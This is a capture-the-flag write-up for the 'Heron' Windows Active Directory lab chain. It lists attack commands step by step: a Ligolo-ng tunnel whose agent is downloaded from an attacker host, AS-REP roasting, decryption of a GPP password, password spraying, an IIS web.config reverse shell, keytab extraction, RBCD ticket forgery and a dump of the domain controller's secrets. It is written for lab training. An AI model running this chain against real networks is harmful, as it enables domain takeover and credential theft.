Chain Heron
Writeup Author: bobbuilder
Overview
Category: Chain
Difficulty: Medium
Machine: Windows
Objective: Heron is an assumed breach Windows domain scenario. Initial access is provided on a jump server as a low-privileged user. The objective is to pivot to the internal DC, escalate privileges, and extract secrets using a combination of Kerberos abuse, credential hunting, RBCD, and web shell deployment.
Enumeration
Initial Access
sshpass -p 'Heron123!' ssh pentest@<jumppoint_ip>
Ligolo-ng Setup (Attack Box)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <jumppoint_ip> via <local_gateway_ip>
sudo ip route add <target_subnet>/24 dev ligolo
./proxy -selfcert -laddr 0.0.0.0:443
Ligolo-ng Agent (Jump Box)
wget <attacker_ip>/agent
./agent -connect <attacker_ip>:443 -ignore-cert
Route to DC
sudo ip route add <dc_ip>/32 dev ligolo
Port Scan and LDAP Discovery
nxc ldap <dc_ip> -u guest -p '' --dns-server <dc_ip> --dns-tcp
Web Enumeration
- Website:
http://<dc_ip>/exposed 3 users. - Found subdomain with 401 auth:
accounting.heron.vl
Subdomain Fuzzing
wfuzz -c --hc 200 -w <subdomain_wordlist> -H "Host: FUZZ.heron.vl" -u http://heron.vl
Kerberos & User Hunting
AS-REP Roasting
impacket-GetNPUsers heron.vl/guest:'' -no-pass -request -k -usersfile users_heron.vl.txt
Cracked Credentials
samuel.davies:<REDACTED>
SMB Enumeration with Valid Creds
nxc smb <dc_ip> -u samuel.davies -p '<REDACTED>' --shares -M spider_plus -o DOWNLOAD_FLAG=true
GPP Password Disclosure
python3 gpp-decrypt.py -f /path/to/Groups.xml
Recovered:
Username: Administrator
Password: <REDACTED>
Domain User Enumeration
nxc smb heron.vl -u users_heron.vl.txt -p '<REDACTED>' --continue-on-success
Found:
svc-web-accounting-d:<REDACTED>
Web Shell Deployment (IIS)
Upload Web Shell via SMB
impacket-smbclient heron.vl/svc-web-accounting-d:'<REDACTED>'@<webserver_ip>
# put web.config (with embedded reverse shell)
Trigger Reverse Shell
curl -u svc-web-accounting-d:<REDACTED> http://accounting.heron.vl/rev.shell
Lateral Movement: Jump Box Privilege Escalation
Extract SSH Creds from .lnk files
cat frajmp.lnk # Extracts: _local:<REDACTED>
Escalate to Root
su _local
sudo su
Kerberos Keytab Extraction
Find and Transfer Keytab
find / -type f -iname '*.keytab'
scp pentest@<jumppoint_ip>:/home/pentest/krb5.keytab .
Parse Keytab
klist -k -t krb5.keytab
python3 keytabextract.py krb5.keytab
Extracted:
FRAJMP$:<REDACTED>
Second Set of Credentials
From mucjmp.lnk:
adm_prju:a<REDACTED>
RBCD (Resource-Based Constrained Delegation)
Grant Delegation
python3 rbcd.py -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -action 'write' heron/adm_prju:<REDACTED> -dc-ip <dc_ip>
Get Service Ticket
impacket-getST -impersonate _admin -spn cifs/mucdc.heron.vl -dc-ip <dc_ip> heron/'FRAJMP$' -hashes :<REDACTED>
export KRB5CCNAME=/path/to/_admin@cifs_mucdc.heron.vl@HERON.VL.ccache
Post-Exploitation
Dump Secrets
impacket-secretsdump -k mucdc.heron.vl
Access C$ with Admin Ticket
smbclient \\\\<dc_ip>\\C$ -U '_admin' --pw-nt-hash <NTLM_HASH>